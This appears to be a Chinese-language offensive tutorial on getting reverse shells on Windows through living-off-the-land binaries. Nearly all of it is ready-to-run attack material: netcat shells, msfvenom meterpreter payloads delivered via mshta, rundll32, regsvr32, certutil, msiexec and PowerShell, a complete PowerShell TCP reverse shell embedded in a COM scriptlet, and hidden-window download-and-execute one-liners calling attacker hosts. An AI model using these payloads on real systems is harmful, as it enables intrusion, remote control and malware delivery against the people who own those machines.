Windows反弹shell方法

反弹Shell简介

正向shell

正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。

image-20230815230003862

反向shell

反向shell(反弹shell):被控端主动发起连接请求去连接控制端。

通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。

image-20230815230446753

NC

NC正向Shell

529fe5158325779302b20fa79d8efc7

被控端:nc -lvvp 6666 -e cmd.exe
控制端:nc 192.168.247.131 6666
原理:被控端将cmd.exe重定向到本地的6666端口,控制端主动连接被控端的6666端口,即可获得shell

被控端:

204877435b55abde9af3249b881c22a

控制端:

90f3aaff7ddb85cafed91e5de63bffe

NC反向Shell

087d5c4a4bb2d77d67446546ae7666d

控制端:nc -lvvp 7777
被控端:nc -e cmd.exe 192.168.1.105 7777
原理:被控端将cmd.exe重定向到控制端的7777端口,控制端只需要监听本地的7777端口,即可获得shell。

控制端:

9ddc8548c87804a962da896eb7b91ec

被控端:

4657c8af3ceb6b1617ab3e25839b3ed

Mshta

Mshta.exe 是用于负责解释运行 HTA (HTML应用程序)文件的Windows OS实用程序。 可以运行JavaScript或VBScript的HTML文件。

Metasploit HTA WebServer

通过Metasploit的 HTA Web Server 模块发起HTA攻击

74a5574a9c974950fbb895e53512c3a

攻击机执行:

1
2
3
4
5
msf6 > use exploit/windows/misc/hta_server
msf6 exploit(windows/misc/hta_server) > set srvhost 192.168.247.135
msf6 exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > set target 1
msf6 exploit(windows/misc/hta_server) > run -j

31fd386fce159a40b3b455bc236ef77

生成hta脚本地址:http://192.168.247.135:8080/Jzb785fYJBr.hta

目标机执行:

1
mshta http://192.168.247.135:8080/Jzb785fYJBr.hta

Msfvenom生成HTA脚本

通过Msfvenom生成恶意HTA文件发起攻击

186b77e6d630e63652a56d8495a99ab

攻击机执行:

1
2
3
4
5
6
7
8
9
#msfvenom 生成 HTA 脚本文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.135 lport=4444 -f hta-psh -o 1.hta

#python3启动Web服务,用于托管HTA脚本
python3 -m http.server

#python2启动Web服务
python2 -m SimpleHTTPServer

42a25c9addf962e61579700f1c61dd2

进入 msfconsole 执行:

1
msf6 > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.247.135 -P 4444

目标机执行:

1
mshta.exe http://192.168.247.135:8000/1.hta

image-20230816170820775

Cobaltstrike生成HTA脚本

7475a59c71731dfd075cdf277a247c1

http://192.168.247.135:80/download/file.ext

Attack > Packages > Html Appactions > 监听器 > Powershell Method

Web Delivery > Host Files > 选择生成的 evil.hta 文件 > 生成托管文件的URL地址

使用 mshta 加载执行,上线到 CobaltStrike

Rundll32

Rundll32.exe与Windows操作系统相关,它允许调用从DLL导出的函数(16位或32位),并将其存储在适当的内存库中。

https://docs.microsoft.com/zh-cn/windows-server/administration/windowscommands/rundll32

Msfvenom生成DLL执行

通过Msfvenom生成反弹shell的dll发起Rundll32攻击

1
2
3
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.247.135 LPORT=5533 -f dll > abc.dll

handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.247.135 -P 5533
  • 本地加载
1
2
3
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.247.135:8000/abc.dll',\"c:\abc.dll\")"

rundll32 shell32.dll,Control_RunDLL C:\abc.dll

image-20230817141134619

image-20230817142925125

image-20230817143155218

  • 利用smb服务远程加载
1
2
3
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.135 lport=5555 -f dll -o abc.dll

impacket-smbserver dll /root/
1
rundll32.exe shell32.dll,Control_RunDLL \\192.168.247.135\dll\abc.dll

Metasploit SMB Delivery

通过Metasploit的SMB Delivery模块发起Rundll32攻击

1
2
3
4
5
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.78.117
msf exploit(windows/smb/smb_delivery) > exploit –j

rundll32.exe \\192.168.78.117\GylDS\test.dll,0
  • 利用Rundll32加载hta反弹shell
1
2
3
4
5
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=7777 -f hta-psh > 44.hta

bitsadmin /transfer shell http://139.155.49.43/44.hta C:\windows\temp\44.hta

rundll32.exe url.dll,OpenURL 44.hta

CobaltStrike生成DLL执行

  • 生成DLL

  • 运行

1
rundll32 beacon.dll,StartW

Regsvr32

Regsvr32.exe是一个命令行应用程序,是 Windows 系统提供的用来向系统注册控件或者卸载控
件的命令,如Windows注册表中的dll和ActiveX控件。
Regsvr32.exe安装在Windows XP和Windows后续版本的 %systemroot%\System32 文件夹中。

https://docs.microsoft.com/zh-cn/windows-server/administration/windowscommands/regsvr32

1
2
3
4
5
语法:Regsvr32 [/s] [/u] [/n][/i[:cmdline]] <dllname>
/u - 注销服务器
/i - 调用DllInstall传递一个可选的[cmdline];当它与/u一起使用时,它调用dll来卸载
/n - 不要调用DllRegisterServer; 此选项必须与/i一起使用
/s - 沉默; 不显示消息框

执行本地Com Scriptlet

  • 执行本地 Com Scriptlet 调用计算器
1
2
3
4
5
6
7
8
9
10
11
12
<?XML version="1.0"?>
<scriptlet>
<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
		<script language="JScript">
			<![CDATA[
				var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
			]]>
</script>
</registration>
</scriptlet>

执行

1
regsvr32.exe /n /s /u /i:cmd.sct scrobj.dll
  • 执行本地 Com Scriptlet 获取反向 Shell
1
2
3
4
5
6
7
8
9
10
11
<?XML version="1.0"?>
<scriptlet>
<registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >

<script language="JScript">
 <![CDATA[
 	var r = new ActiveXObject("WScript.Shell").Run('powershell -w Hidden -c "$client = New-Object System.Net.Sockets.TCPClient(\'124.71.45.28\',10000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' +(pwd).Path + \'> \';$sendbyte =([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"');
 ]]>
</script>
</registration>
</scriptlet>

执行:

1
2
nc -lvvp 10000
regsvr32.exe /n /s /u /i:rev.sct scrobj.dll

执行远程 Com Scriptlet

  • 执行远程 Com Scriptlet 获取反向 Shell
1
2
nc -lvvp 10000
regsvr32.exe /n /s /u /i:http://10.42.0.1/rev.sct scrobj.dll

Metasploit Web Delivery

通过Metasploit的Web Delivery模块启动Regsvr32

1
2
3
4
5
6
7
8
use exploit/multi/script/web_delivery
msf exploit (web_delivery)> set srvhost 192.168.78.117
msf exploit (web_delivery)> set target 3
msf exploit (web_delivery)> set payload windows/x64/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.78.117
msf exploit (web_delivery)> exploit –j

regsvr32 /s /n /u /i:http://192.168.78.117:8080/NE67gb2mbfQt.sct scrobj.dll

Powershell

https://docs.microsoft.com/zh-cn/powershell/

https://www.freebuf.com/articles/web/220046.html

https://docs.microsoft.com/zh-cn/windows-server/administration/windowscommands/powershell

常用参数解释

1
2
3
4
5
6
Invoke-Expression(IEX的别名):用来把字符串当作命令执行。
WindowStyle Hidden(-w Hidden):隐藏窗口
Nonlnteractive(-NonI):非交互模式,PowerShell不为用户提供交互的提示
NoProfile(-NoP):PowerShell控制台不加载当前用户的配置文件。
Noexit(-Noe):执行后不退出Shell。
EncodedCommand(-enc): 接受base64 encode的字符串编码,避免一些解析问题

Msfvenom生成Powershell脚本

1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=47.236.16.67 lport=9999 -f psh-reflection -o 9999.ps1
1
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://47.236.16.67:8000/9999.ps1');9999.ps1";

PowerShell加载Powercat

Powercat是PowerShell本地后门侦听器和反向shell工具,也称为修改版本的netcat,因为它集成支持经过编码的有效载荷。

1
2
3
4
5
git clone https://github.com/besimorhino/powercat.git

python -m SimpleHTTPServer 8000

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://47.101.214.85:8000/powercat.ps1');powercat -c 47.101.214.85 -p 12345 -e cmd"

Metasploit Web Delivery

通过Web Delivery反弹shell

1
2
3
4
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
msf exploit(web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(web_delivery) > exploit -j

powershell启动exe

  • Metasploit生成恶意exe文件
1
2
3
4
5
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.78.117 LPORT=4445 -f exe -o 1.exe

python –m SimpleHTTPServer 8000

msf5 > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.78.117 -P 4445
  • powershell加载执行
1
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.78.117:8000/1.exe','1.exe');start 1.exe
1
powershell -ep bypass -nop -w hidden (new-object system.net.webclient).downloadfile('http://192.168.78.117:8000/1.exe','1.exe');start-process 1.exe

PowerShell启动Cscript

PowerShell允许客户端通过执行 cscript.exe 来运行wsf、js和vbscript脚本。

1
2
3
4
5
6
7
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=139.155.49.43 LPORT=7777 -f vbs -o3.vbs

#python2启动web服务
python -m SimpleHTTPServer 8000

#python3启动web服务
python3 -m http.server
1
2
3
4
msf5 > handler -p windows/x64/meterpreter/reverse_tcp -H 139.155.49.43 -P 7777

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://139.155.49.43:8000/3.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$en
v:temp\test.vbs\""

PowerShell启动BAT文件

PowerShell允许客户端执行bat文件

1
2
3
4
5
6
7
msfvenom -p cmd/windows/powershell_reverse_tcp lhost=139.155.49.43 lport=8888 -o 1.bat

msf > handler -p cmd/windows/powershell_reverse_tcp -H 172.17.0.2 -P 8888

python -m SimpleHTTPServer 8000

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://139.155.49.43:8000/1.bat'))"

Certutil

Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目标计算机中执行恶意的exe文件以获得meterpreter会话。

https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/certutil

1
2
3
4
5
6
7
8
9
10
11
12
13
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=6666 -f exe >44.exe

#python2启动web服务

python2 -m SimpleHTTPServer 8000

#python3启动web服务

python3 -m http.server 8080

certutil.exe -urlcache -split -f http://139.155.49.43/44.exe c:\windows\temp\44.exe & start c:\windows\temp\44.exe

certutil.exe -urlcache -split -f http://139.155.49.43/44.exe delete

缓存文件位置:
%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

Msiexec

  • Metasploit + misexe

Windows系统安装有一个Windows安装引擎,MSI 包使用msiexe.exe来解释安装。

1
2
3
4
5
6
7
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=9999 -f msi >1.msi

python -m SimpleHTTPServer

msf > handler -p windows/x64/meterpreter/reverse_tcp -H 172.17.0.2 -P 9999

msiexec /q /i http://139.155.49.43:8000/1.msi